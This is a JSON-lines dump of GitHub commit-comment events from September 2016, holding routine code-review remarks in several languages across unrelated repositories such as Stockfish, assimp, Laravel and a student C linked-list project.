{"id":"4543628340","type":"CommitCommentEvent","actor":{"login":"fititnt"},"repo":{"name":"webiwg/webiwg-issues"},"payload":{"comment":{"id":18972917,"position":null,"line":null,"path":null,"commit_id":"d8efee004a8d6c9a971787afd48f4d54ff1d7277","created_at":"2016-09-10T07:25:31Z","updated_at":"2016-09-10T07:25:31Z","body":"(っ◕‿◕)っ @tassoevan \r\n\r\nvoce pode colocar na linha do commit o numero do issue, tipo \"#6 traducao.md: correções de sintaxe e concordância na introdução\""}},"created_at":"2016-09-10T07:25:31Z"}
{"id":"4543631659","type":"CommitCommentEvent","actor":{"login":"ElementalKiss"},"repo":{"name":"CheshireCoder8/TIL"},"payload":{"comment":{"id":18972921,"position":null,"line":null,"path":null,"commit_id":"bfd3c616dd0b76092ed9ba9a0b51ee45f9c6ab2c","created_at":"2016-09-10T07:28:27Z","updated_at":"2016-09-10T07:28:27Z","body":"흠흠 훌륭해 훌륭해. 역시 CC8님은 생각을 많이 해서 좋습니다!"}},"created_at":"2016-09-10T07:28:27Z"}
{"id":"4543633069","type":"CommitCommentEvent","actor":{"login":"abc123994"},"repo":{"name":"abc123994/colour"},"payload":{"comment":{"id":18972923,"position":null,"line":null,"path":null,"commit_id":"64b2efa7c91c2d27e218006cf1408f042065d6e0","created_at":"2016-09-10T07:29:43Z","updated_at":"2016-09-10T07:29:43Z","body":"排行被吃的問題,tmp陣列存的空間範圍 和數值錯誤"}},"created_at":"2016-09-10T07:29:43Z"}
{"id":"4543634382","type":"CommitCommentEvent","actor":{"login":"fititnt"},"repo":{"name":"webiwg/webiwg-issues"},"payload":{"comment":{"id":18972925,"position":202,"line":209,"path":"traducao.md","commit_id":"d1070d6ab261b0b925621e76e5e5518b3dc314c1","created_at":"2016-09-10T07:30:45Z","updated_at":"2016-09-10T07:30:45Z","body":"Refs #6 \r\n\r\nEm webiwg/historia-web-pt#2 temos o link https://www.w3.org/2005/01/timelines/. Repare que temos duas imagens nesse diretório. Algumas imagens não são para exibição como uma imagem no site, mas sim são para impressão. Logo, explicitamente NESTAS imagens, que o objetivo é permitir que uma pessoa imprima e coloque na parede, no não precisamos _ser antissemitistas_ e obrigar que tenham que ser exatamente de um jeito sem discussão :)\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-10T07:30:45Z"}
{"id":"4543635076","type":"CommitCommentEvent","actor":{"login":"ElementalKiss"},"repo":{"name":"sbahn123/learning"},"payload":{"comment":{"id":18972926,"position":null,"line":null,"path":null,"commit_id":"35e75dba9e5315d9edc86f1150193d4617d9e2f6","created_at":"2016-09-10T07:31:25Z","updated_at":"2016-09-10T07:31:25Z","body":"What are the benefits of this program?"}},"created_at":"2016-09-10T07:31:25Z"}
{"id":"4543635298","type":"CommitCommentEvent","actor":{"login":"abc123994"},"repo":{"name":"abc123994/colour"},"payload":{"comment":{"id":18972927,"position":null,"line":null,"path":null,"commit_id":"bc5af54ac669046838c7e7f85a52547e87df9a46","created_at":"2016-09-10T07:31:37Z","updated_at":"2016-09-10T07:31:37Z","body":"當排行滿的時候,如果出現一個不會進排行的值\r\nifwrite會跑到!stop會回傳0"}},"created_at":"2016-09-10T07:31:37Z"}
{"id":"4543638280","type":"CommitCommentEvent","actor":{"login":"tohhhin"},"repo":{"name":"tohhhin/git-tutorial"},"payload":{"comment":{"id":18972931,"position":3,"line":3,"path":"files/lab_24/index.html","commit_id":"859d3a0e6c615fc2ea5f28c73d60324209f73092","created_at":"2016-09-10T07:34:35Z","updated_at":"2016-09-10T07:34:35Z","body":"tosha - nesterusha"}},"created_at":"2016-09-10T07:34:35Z"}
{"id":"4543640830","type":"CommitCommentEvent","actor":{"login":"CavenChenYFY"},"repo":{"name":"CavenChenYFY/SaleExportSys_ASP"},"payload":{"comment":{"id":18972935,"position":null,"line":null,"path":null,"commit_id":"eb00d2e66d6a850a366c9b12e78812d21c7a9db1","created_at":"2016-09-10T07:36:56Z","updated_at":"2016-09-10T07:36:56Z","body":"First Initial Commit."}},"created_at":"2016-09-10T07:36:56Z"}
{"id":"4543641159","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":18972936,"position":null,"line":null,"path":null,"commit_id":"647c3b12ab8d0beb7a0dedb091bc6a24f0e56d8f","created_at":"2016-09-10T07:37:13Z","updated_at":"2016-09-10T07:37:13Z","body":"Why did you stop it?"}},"created_at":"2016-09-10T07:37:13Z"}
{"id":"4543644316","type":"CommitCommentEvent","actor":{"login":"networkimprov"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":18972939,"position":null,"line":null,"path":null,"commit_id":"0ad6c3c50ae280c456b212ae4fe6283f67c78331","created_at":"2016-09-10T07:40:09Z","updated_at":"2016-09-10T07:40:09Z","body":"Either case in the switch can set gpio to 0, which might be confusing. Maybe...\r\n```\r\nisc_reg &= BQ24190_REG_ISC_IINLIM_MASK;\r\npg_state = pg_state && isc_reg == BQ24190_REG_ISC_IINLIM_500MA;\r\ngpio_set_value_cansleep(bdi->gpio_otg, pg_state);\r\n```\r\n\r\nIt's not clear why pg_stat determines gpio state vs vbus_stat. If correct, maybe comment it."}},"created_at":"2016-09-10T07:40:09Z"}
{"id":"4543644998","type":"CommitCommentEvent","actor":{"login":"javierbyte"},"repo":{"name":"petehunt/react-howto"},"payload":{"comment":{"id":18972940,"position":21,"line":15,"path":"README-es.md","commit_id":"5e9502ce45f8dbf9cb0065d8e8e569d3dc1ed522","created_at":"2016-09-10T07:40:40Z","updated_at":"2016-09-10T07:40:40Z","body":"¿'StartUp'? Justo iba a hacer un PR cambiando esto por 'startup'. ¿Algún motivo en particular para esta escritura @juliandavidmr ?"}},"created_at":"2016-09-10T07:40:40Z"}
{"id":"4543645523","type":"CommitCommentEvent","actor":{"login":"tmtmtmtm"},"repo":{"name":"everypolitician/viewer-sinatra"},"payload":{"comment":{"id":18972941,"position":null,"line":null,"path":null,"commit_id":"142911b52bbae786896fe382763c5ccd84566427","created_at":"2016-09-10T07:41:10Z","updated_at":"2016-09-10T07:41:10Z","body":"I'm finding this commit quite confusing, I'm afraid.\r\n\r\nPartially I think this is because it's doing two different things. I suspect you want a separate commit for splitting out the `meta_redirect` from `docs_redirect`, and then a second commit for changing the download route to use it. But it's also not immediately obvious why you're switching from instantiating `Page::Download` to `Page::Country` — I think that needs an explanation somewhere (at a minimum in the commit message)"}},"created_at":"2016-09-10T07:41:10Z"}
{"id":"4543646776","type":"CommitCommentEvent","actor":{"login":"tmtmtmtm"},"repo":{"name":"everypolitician/viewer-sinatra"},"payload":{"comment":{"id":18972942,"position":null,"line":null,"path":null,"commit_id":"823f51c0997f36bc6ce5ac2be91ceb8ddf53e31f","created_at":"2016-09-10T07:42:18Z","updated_at":"2016-09-10T07:42:18Z","body":"I think you need a commit message to explain _why_ you're deleting this."}},"created_at":"2016-09-10T07:42:18Z"}
{"id":"4543646890","type":"CommitCommentEvent","actor":{"login":"javierbyte"},"repo":{"name":"petehunt/react-howto"},"payload":{"comment":{"id":18972943,"position":65,"line":54,"path":"README-es.md","commit_id":"5e9502ce45f8dbf9cb0065d8e8e569d3dc1ed522","created_at":"2016-09-10T07:42:26Z","updated_at":"2016-09-10T07:42:26Z","body":"Aquí el 'más' sí llevaba tilde."}},"created_at":"2016-09-10T07:42:26Z"}
{"id":"4543647162","type":"CommitCommentEvent","actor":{"login":"tmtmtmtm"},"repo":{"name":"everypolitician/viewer-sinatra"},"payload":{"comment":{"id":18972944,"position":null,"line":null,"path":null,"commit_id":"4e57a81595d0631b481943c322b5254ea1251e26","created_at":"2016-09-10T07:42:39Z","updated_at":"2016-09-10T07:42:39Z","body":"I think you need a commit message to explain _why_ you're deleting this one too."}},"created_at":"2016-09-10T07:42:39Z"}
{"id":"4543647646","type":"CommitCommentEvent","actor":{"login":"tmtmtmtm"},"repo":{"name":"everypolitician/viewer-sinatra"},"payload":{"comment":{"id":18972945,"position":null,"line":null,"path":null,"commit_id":"6a17b8100a75e4fd8da99ecc551befa899a69423","created_at":"2016-09-10T07:43:07Z","updated_at":"2016-09-10T07:43:07Z","body":"and another commit message explanation for why…"}},"created_at":"2016-09-10T07:43:07Z"}
{"id":"4543648204","type":"CommitCommentEvent","actor":{"login":"smalcom"},"repo":{"name":"assimp/assimp"},"payload":{"comment":{"id":18972946,"position":null,"line":null,"path":null,"commit_id":"22cfe84cba10caebea61078c16fbb564af9e39dc","created_at":"2016-09-10T07:43:35Z","updated_at":"2016-09-10T07:43:35Z","body":"Emmm. Did you saw that requirement for Qt4 changed to Qt5?\r\nQt4 has more stable ABI. Ans also source code of viewer is use Qt4 API."}},"created_at":"2016-09-10T07:43:35Z"}
{"id":"4543648389","type":"CommitCommentEvent","actor":{"login":"rimace"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18972947,"position":13,"line":13,"path":"CHANGELOG-5.3.md","commit_id":"b5bfac08209462ad49a91ef2d21fb34e6b39233a","created_at":"2016-09-10T07:43:44Z","updated_at":"2016-09-10T07:43:44Z","body":"This change was made in the 5.1 branch. I don't see any change for Laravel 5.3, it uses symfony 3.1."}},"created_at":"2016-09-10T07:43:44Z"}
{"id":"4543649055","type":"CommitCommentEvent","actor":{"login":"javierbyte"},"repo":{"name":"petehunt/react-howto"},"payload":{"comment":{"id":18972949,"position":124,"line":98,"path":"README-es.md","commit_id":"5e9502ce45f8dbf9cb0065d8e8e569d3dc1ed522","created_at":"2016-09-10T07:44:21Z","updated_at":"2016-09-10T07:44:21Z","body":"'reescribir' es una palabra, no necesitamos separarla."}},"created_at":"2016-09-10T07:44:21Z"}
{"id":"4543649455","type":"CommitCommentEvent","actor":{"login":"tmtmtmtm"},"repo":{"name":"everypolitician/viewer-sinatra"},"payload":{"comment":{"id":18972950,"position":null,"line":null,"path":null,"commit_id":"00a9ba185388a7630d1cb619f15b5c2126b8816b","created_at":"2016-09-10T07:44:45Z","updated_at":"2016-09-10T07:44:45Z","body":"And explanation needed here too. (I also suspect you can roll all four of these deletions into a single commit)"}},"created_at":"2016-09-10T07:44:45Z"}
{"id":"4543652767","type":"CommitCommentEvent","actor":{"login":"k-okada"},"repo":{"name":"jsk-ros-pkg/jsk_recognition"},"payload":{"comment":{"id":18972956,"position":8,"line":8,"path":"jsk_pcl_ros/test/test_euclidean_segmentation.test","commit_id":"fc5fa1677ea09a6b84b995346f0ef2b938e1dc57","created_at":"2016-09-10T07:47:46Z","updated_at":"2016-09-10T07:47:46Z","body":"no, I think --clock with `use_sim_time=true` is the best, but since 2015-11-04-19-37-29_baxter-kiva-object-in-hand-cloud/vision.compressed.bag has only 2 sec, we can use this with sim time,\r\nAt this moment, I think without `--clock` is the best choice, we do not explicitly set `use_sim_time:=false`, but I do not want to say you'd better to change this code. Just to share information. "}},"created_at":"2016-09-10T07:47:46Z"}
{"id":"4543655408","type":"CommitCommentEvent","actor":{"login":"lukasoppermann"},"repo":{"name":"lukasoppermann/mark"},"payload":{"comment":{"id":18972958,"position":null,"line":null,"path":null,"commit_id":"a6dfc458d35a9e758b741449ec25782479addb36","created_at":"2016-09-10T07:50:09Z","updated_at":"2016-09-10T07:50:09Z","body":"Well, mark was not available, so I really have no choice."}},"created_at":"2016-09-10T07:50:09Z"}
{"id":"4543656132","type":"CommitCommentEvent","actor":{"login":"networkimprov"},"repo":{"name":"networkimprov/omap3-usb-boot-install"},"payload":{"comment":{"id":18972960,"position":null,"line":null,"path":null,"commit_id":"6807ee36dafd0ec8a1997eb641eec09198b38c8e","created_at":"2016-09-10T07:50:44Z","updated_at":"2016-09-10T07:50:44Z","body":"@tmlind can you review?"}},"created_at":"2016-09-10T07:50:44Z"}
{"id":"4543656663","type":"CommitCommentEvent","actor":{"login":"codetiger"},"repo":{"name":"assimp/assimp"},"payload":{"comment":{"id":18972961,"position":null,"line":null,"path":null,"commit_id":"22cfe84cba10caebea61078c16fbb564af9e39dc","created_at":"2016-09-10T07:51:11Z","updated_at":"2016-09-10T07:51:11Z","body":"A c\nW\n\nOn Saturday, September 10, 2016, smalcom <notifications@github.com> wrote:\n\n> Emmm. Did you saw that requirement for Qt4 changed to Qt5?\n> Qt4 has more stable ABI. Ans also source code of viewer is use Qt4 API.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/assimp/assimp/commit/22cfe84cba10caebea61078c16fbb564af9e39dc#commitcomment-18972946>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAljqbNPQB_US4CTziCwr_8r2zkVA2Qyks5qol-pgaJpZM4J5qWe>\n> .\n>\n\n\n-- \nThanks and best regards,\nHarishankar Narayanan,\nSmackall Games Private Limited,\n3/1a, Ramarao Garden, 2nd Street,\nRoyapettah, Chennai - 14\nMobile: +91 99401 77422\n"}},"created_at":"2016-09-10T07:51:11Z"}
{"id":"4543657284","type":"CommitCommentEvent","actor":{"login":"codetiger"},"repo":{"name":"assimp/assimp"},"payload":{"comment":{"id":18972962,"position":null,"line":null,"path":null,"commit_id":"22cfe84cba10caebea61078c16fbb564af9e39dc","created_at":"2016-09-10T07:51:47Z","updated_at":"2016-09-10T07:51:47Z","body":"Sc dA fWa\n\nOn Saturday, September 10, 2016, smalcom <notifications@github.com> wrote:\n\n> Emmm. Did you saw that requirement for Qt4 changed to Qt5?\n> Qt4 has more stable ABI. Ans also source code of viewer is use Qt4 API.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/assimp/assimp/commit/22cfe84cba10caebea61078c16fbb564af9e39dc#commitcomment-18972946>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAljqbNPQB_US4CTziCwr_8r2zkVA2Qyks5qol-pgaJpZM4J5qWe>\n> .\n>\n\n\n-- \nThanks and best regards,\nHarishankar Narayanan,\nSmackall Games Private Limited,\n3/1a, Ramarao Garden, 2nd Street,\nRoyapettah, Chennai - 14\nMobile: +91 99401 77422\n"}},"created_at":"2016-09-10T07:51:47Z"}
{"id":"4543658017","type":"CommitCommentEvent","actor":{"login":"smalcom"},"repo":{"name":"assimp/assimp"},"payload":{"comment":{"id":18972963,"position":null,"line":null,"path":null,"commit_id":"22cfe84cba10caebea61078c16fbb564af9e39dc","created_at":"2016-09-10T07:52:29Z","updated_at":"2016-09-10T07:52:29Z","body":"> A c W\r\n\r\nWhat? )))\r\n\r\nI propose to use both version. I mean: which version found it will be used."}},"created_at":"2016-09-10T07:52:29Z"}
{"id":"4543662356","type":"CommitCommentEvent","actor":{"login":"wkentaro"},"repo":{"name":"jsk-ros-pkg/jsk_recognition"},"payload":{"comment":{"id":18972967,"position":8,"line":8,"path":"jsk_pcl_ros/test/test_euclidean_segmentation.test","commit_id":"fc5fa1677ea09a6b84b995346f0ef2b938e1dc57","created_at":"2016-09-10T07:56:44Z","updated_at":"2016-09-10T07:56:44Z","body":"Alright, Thanks."}},"created_at":"2016-09-10T07:56:44Z"}
{"id":"4543662692","type":"CommitCommentEvent","actor":{"login":"Haxk20"},"repo":{"name":"silver13/h8mini-testing"},"payload":{"comment":{"id":18972968,"position":null,"line":null,"path":null,"commit_id":"d6363393b38ed5029911a9a3e2a1fc309cfe7088","created_at":"2016-09-10T07:57:02Z","updated_at":"2016-09-10T07:57:02Z","body":"ok but now i have one issue i buyed another quad eachine h8 mini flashed your firmware but when i start it doesnt matter acro or level the bottom left motor is not spinning only if i rotate a quad to the bottom left then motor start to spin it was not doing on original firmware only on your any idea how to fix that i dont think its motor issue because when quad is on the bottom left angle start to spin HELP "}},"created_at":"2016-09-10T07:57:02Z"}
{"id":"4543668895","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":18972974,"position":null,"line":null,"path":null,"commit_id":"647c3b12ab8d0beb7a0dedb091bc6a24f0e56d8f","created_at":"2016-09-10T08:02:19Z","updated_at":"2016-09-10T08:02:19Z","body":"Because it has no measurable effect with the currently used adjudication rule. And there are way too less endgames using VALUE_KNOWN_WIN.\r\nI'm trying to write some more basic endgame functions in the coming weeks, like KNKP, KBKP, KNPK, KBPK, etc. But it's a difficult and very time-consuming task, without guarantee of being an improvement."}},"created_at":"2016-09-10T08:02:19Z"}
{"id":"4543673264","type":"CommitCommentEvent","actor":{"login":"anderbw"},"repo":{"name":"anderbw/ACRL"},"payload":{"comment":{"id":18972979,"position":null,"line":null,"path":null,"commit_id":"4982488fdb2b499f8a7889fa3d5a11adb836c3d4","created_at":"2016-09-10T08:05:49Z","updated_at":"2016-09-10T08:05:49Z","body":"And why didn't this add my files?! Blast, maybe git foiled me."}},"created_at":"2016-09-10T08:05:49Z"}
{"id":"4543673415","type":"CommitCommentEvent","actor":{"login":"phobosgroup"},"repo":{"name":"phobosgroup/dtc2"},"payload":{"comment":{"id":18972980,"position":null,"line":null,"path":null,"commit_id":"8cf650c17d7f0af0b70e9e6ee134d2de7a29fc42","created_at":"2016-09-10T08:05:58Z","updated_at":"2016-09-10T08:05:58Z","body":"no the curl command should still be in there - its fetching one of the master scripts\r\n"}},"created_at":"2016-09-10T08:05:58Z"}
{"id":"4543674494","type":"CommitCommentEvent","actor":{"login":"evgkul"},"repo":{"name":"LemADEC/WarpDrive"},"payload":{"comment":{"id":18972983,"position":null,"line":null,"path":null,"commit_id":"b457bca93487e8a8cd01e235cb511cea95424a74","created_at":"2016-09-10T08:06:59Z","updated_at":"2016-09-10T08:06:59Z","body":"Can you add a possiblity to safely remove it by using BIG amount of energy & time?"}},"created_at":"2016-09-10T08:06:59Z"}
{"id":"4543675864","type":"CommitCommentEvent","actor":{"login":"yyx990803"},"repo":{"name":"vuejs/vue"},"payload":{"comment":{"id":18972985,"position":22,"line":161,"path":"src/core/instance/render.js","commit_id":"100a2969aa5c64bd71758c79881cf4531e9907be","created_at":"2016-09-10T08:08:08Z","updated_at":"2016-09-10T08:08:08Z","body":"good catch!"}},"created_at":"2016-09-10T08:08:08Z"}
{"id":"4543677096","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18972986,"position":10,"line":10,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:09:11Z","updated_at":"2016-09-10T08:09:11Z","body":"add new line between functions"}},"created_at":"2016-09-10T08:09:11Z"}
{"id":"4543677931","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18972987,"position":29,"line":29,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:09:56Z","updated_at":"2016-09-10T08:09:56Z","body":"Choose one comment format:\r\n// or /* */"}},"created_at":"2016-09-10T08:09:56Z"}
{"id":"4543678148","type":"CommitCommentEvent","actor":{"login":"arnocandel"},"repo":{"name":"h2oai/h2o-3"},"payload":{"comment":{"id":18972988,"position":12,"line":130,"path":"h2o-algos/src/main/java/hex/deepwater/DeepWaterImageIterator.java","commit_id":"7897cb0fead964d9cd6f7c5f0f624440219e6ba0","created_at":"2016-09-10T08:10:07Z","updated_at":"2016-09-10T08:10:07Z","body":"Yes, i think I see it now - the while() loop would finish, and data/label would get gc'ed away eventually, but the consumer from the last iteration would still be running.\r\n\r\nThe cleaner fix would be to add the fs.blockForPending() outside the while() loop."}},"created_at":"2016-09-10T08:10:07Z"}
{"id":"4543678527","type":"CommitCommentEvent","actor":{"login":"Haxk20"},"repo":{"name":"silver13/h8mini-testing"},"payload":{"comment":{"id":18972989,"position":null,"line":null,"path":null,"commit_id":"d6363393b38ed5029911a9a3e2a1fc309cfe7088","created_at":"2016-09-10T08:10:22Z","updated_at":"2016-09-10T08:10:22Z","body":"and yes i have dome calibration several times move right stick down 3 times in 1-2 seconds flashes few times and i even try to erase the chip and flash it on horizontal surface but nothing is working the quad is moving to the bottom left"}},"created_at":"2016-09-10T08:10:22Z"}
{"id":"4543678986","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18972990,"position":67,"line":67,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:10:45Z","updated_at":"2016-09-10T08:10:45Z","body":"no need for {"}},"created_at":"2016-09-10T08:10:45Z"}
{"id":"4543679614","type":"CommitCommentEvent","actor":{"login":"railsfactory-kumaresan"},"repo":{"name":"railsfactory-kumaresan/Email-Engine"},"payload":{"comment":{"id":18972991,"position":1,"line":1,"path":".env","commit_id":"c38e5109013d18753c0e2c3a3c6ce96be6cb5e00","created_at":"2016-09-10T08:11:16Z","updated_at":"2016-09-10T08:11:16Z","body":"@amaninquirly. You shouldn't suppose to commit the .env file to git. Please remove this file ASAP."}},"created_at":"2016-09-10T08:11:16Z"}
{"id":"4543679750","type":"CommitCommentEvent","actor":{"login":"rayallen3001"},"repo":{"name":"rayallen3001/test_git"},"payload":{"comment":{"id":18972992,"position":null,"line":null,"path":null,"commit_id":"df29c4cb8fc921907638c380a51c96c78bc0467a","created_at":"2016-09-10T08:11:23Z","updated_at":"2016-09-10T08:11:23Z","body":"33333"}},"created_at":"2016-09-10T08:11:23Z"}
{"id":"4543680213","type":"CommitCommentEvent","actor":{"login":"railsfactory-kumaresan"},"repo":{"name":"railsfactory-kumaresan/Email-Engine"},"payload":{"comment":{"id":18972993,"position":36,"line":36,"path":"app/controllers/api/v1/user_controller.rb","commit_id":"c38e5109013d18753c0e2c3a3c6ce96be6cb5e00","created_at":"2016-09-10T08:11:50Z","updated_at":"2016-09-10T08:11:50Z","body":"@amaninquirly Move this code to api controller. Because this method repeats in both users and campaigns controller."}},"created_at":"2016-09-10T08:11:50Z"}
{"id":"4543680297","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18972995,"position":94,"line":94,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:11:55Z","updated_at":"2016-09-10T08:11:55Z","body":"no need for {"}},"created_at":"2016-09-10T08:11:55Z"}
{"id":"4543680894","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18972996,"position":114,"line":114,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:12:25Z","updated_at":"2016-09-10T08:12:25Z","body":"add space"}},"created_at":"2016-09-10T08:12:25Z"}
{"id":"4543681237","type":"CommitCommentEvent","actor":{"login":"railsfactory-kumaresan"},"repo":{"name":"railsfactory-kumaresan/Email-Engine"},"payload":{"comment":{"id":18972997,"position":6,"line":6,"path":"app/mailers/email_template.rb","commit_id":"c38e5109013d18753c0e2c3a3c6ce96be6cb5e00","created_at":"2016-09-10T08:12:45Z","updated_at":"2016-09-10T08:12:45Z","body":"@amaninquirly  This value suppose to fetch from ENV file."}},"created_at":"2016-09-10T08:12:45Z"}
{"id":"4543681462","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18972999,"position":153,"line":153,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:12:57Z","updated_at":"2016-09-10T08:12:57Z","body":"space"}},"created_at":"2016-09-10T08:12:57Z"}
{"id":"4543681767","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973000,"position":158,"line":158,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:13:13Z","updated_at":"2016-09-10T08:13:13Z","body":"space"}},"created_at":"2016-09-10T08:13:13Z"}
{"id":"4543682379","type":"CommitCommentEvent","actor":{"login":"railsfactory-kumaresan"},"repo":{"name":"railsfactory-kumaresan/Email-Engine"},"payload":{"comment":{"id":18973002,"position":3,"line":3,"path":"app/models/application_mailer.rb","commit_id":"c38e5109013d18753c0e2c3a3c6ce96be6cb5e00","created_at":"2016-09-10T08:13:42Z","updated_at":"2016-09-10T08:13:42Z","body":"@amaninquirly Remove this default from. It should be admin email."}},"created_at":"2016-09-10T08:13:42Z"}
{"id":"4543682687","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973003,"position":175,"line":175,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:13:59Z","updated_at":"2016-09-10T08:13:59Z","body":"You waste lines. Use:\r\n} esle {"}},"created_at":"2016-09-10T08:13:59Z"}
{"id":"4543682776","type":"CommitCommentEvent","actor":{"login":"railsfactory-kumaresan"},"repo":{"name":"railsfactory-kumaresan/Email-Engine"},"payload":{"comment":{"id":18973004,"position":6,"line":6,"path":"app/models/campaign.rb","commit_id":"c38e5109013d18753c0e2c3a3c6ce96be6cb5e00","created_at":"2016-09-10T08:14:06Z","updated_at":"2016-09-10T08:14:06Z","body":"@amaninquirly Remove here too."}},"created_at":"2016-09-10T08:14:06Z"}
{"id":"4543683163","type":"CommitCommentEvent","actor":{"login":"arnocandel"},"repo":{"name":"h2oai/h2o-3"},"payload":{"comment":{"id":18973005,"position":12,"line":130,"path":"h2o-algos/src/main/java/hex/deepwater/DeepWaterImageIterator.java","commit_id":"7897cb0fead964d9cd6f7c5f0f624440219e6ba0","created_at":"2016-09-10T08:14:26Z","updated_at":"2016-09-10T08:14:26Z","body":"see 0ecf96c7f05e4fd05062f93d336c045bf224ff53"}},"created_at":"2016-09-10T08:14:26Z"}
{"id":"4543683437","type":"CommitCommentEvent","actor":{"login":"railsfactory-kumaresan"},"repo":{"name":"railsfactory-kumaresan/Email-Engine"},"payload":{"comment":{"id":18973006,"position":32,"line":32,"path":"app/models/campaign.rb","commit_id":"c38e5109013d18753c0e2c3a3c6ce96be6cb5e00","created_at":"2016-09-10T08:14:41Z","updated_at":"2016-09-10T08:14:41Z","body":"@amaninquirly Remove all the puts before commit."}},"created_at":"2016-09-10T08:14:41Z"}
{"id":"4543683564","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973007,"position":196,"line":196,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:14:47Z","updated_at":"2016-09-10T08:14:47Z","body":"new line between declaration and logic "}},"created_at":"2016-09-10T08:14:47Z"}
{"id":"4543685795","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973008,"position":237,"line":237,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:16:27Z","updated_at":"2016-09-10T08:16:27Z","body":"poly *polynom and not poly* polynom"}},"created_at":"2016-09-10T08:16:27Z"}
{"id":"4543686084","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973009,"position":239,"line":239,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:16:41Z","updated_at":"2016-09-10T08:16:41Z","body":"same"}},"created_at":"2016-09-10T08:16:41Z"}
{"id":"4543686370","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973010,"position":242,"line":242,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:16:55Z","updated_at":"2016-09-10T08:16:55Z","body":"new line"}},"created_at":"2016-09-10T08:16:55Z"}
{"id":"4543686761","type":"CommitCommentEvent","actor":{"login":"railsfactory-kumaresan"},"repo":{"name":"railsfactory-kumaresan/Email-Engine"},"payload":{"comment":{"id":18973011,"position":1,"line":1,"path":"db/schema.rb","commit_id":"c38e5109013d18753c0e2c3a3c6ce96be6cb5e00","created_at":"2016-09-10T08:17:14Z","updated_at":"2016-09-10T08:17:14Z","body":"@amaninquirly Shema file suppose to have only the tables related with this application."}},"created_at":"2016-09-10T08:17:14Z"}
{"id":"4543686783","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973012,"position":251,"line":251,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:17:15Z","updated_at":"2016-09-10T08:17:15Z","body":"add tab"}},"created_at":"2016-09-10T08:17:15Z"}
{"id":"4543687316","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973013,"position":280,"line":280,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:17:42Z","updated_at":"2016-09-10T08:17:42Z","body":"new line"}},"created_at":"2016-09-10T08:17:42Z"}
{"id":"4543687461","type":"CommitCommentEvent","actor":{"login":"stefanchulski"},"repo":{"name":"WildandArt/DoublyLL"},"payload":{"comment":{"id":18973014,"position":283,"line":283,"path":"poly.c","commit_id":"f7d5abf3ea6dc1c92b0364c251835f9a5810547e","created_at":"2016-09-10T08:17:49Z","updated_at":"2016-09-10T08:17:49Z","body":"tab"}},"created_at":"2016-09-10T08:17:49Z"}
